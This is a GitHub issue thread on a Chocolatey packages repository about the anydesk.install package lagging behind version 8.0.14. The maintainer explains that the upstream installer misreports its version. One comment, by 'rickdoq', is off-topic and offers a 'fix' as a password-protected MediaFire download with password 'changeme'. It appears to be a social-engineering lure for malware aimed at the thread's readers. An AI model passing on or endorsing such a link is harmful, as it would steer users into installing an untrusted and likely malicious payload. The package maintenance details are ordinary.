### ISSUE TITLE
anydesk.install outdated

### ISSUE THREAD

**Issue by AIVAS001** [TheCakeIsNaOH/chocolatey-packages#36]
Package id: anydesk.install

Current package version: 8.0.13
Version to update to: 8.0.14

anydesk.msi v8.0.14 checksum is 489a4096a1a4dcc02eaeb0b771766407b3f63fc5e31dc7e4eec5cab29635ae0f

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by TheCakeIsNaOH** [comment]
It looks like there is an issue with the v8.0.14 release, the installer reports itself as v8.0.12. 
I've manually updated the package, it should be working again now.
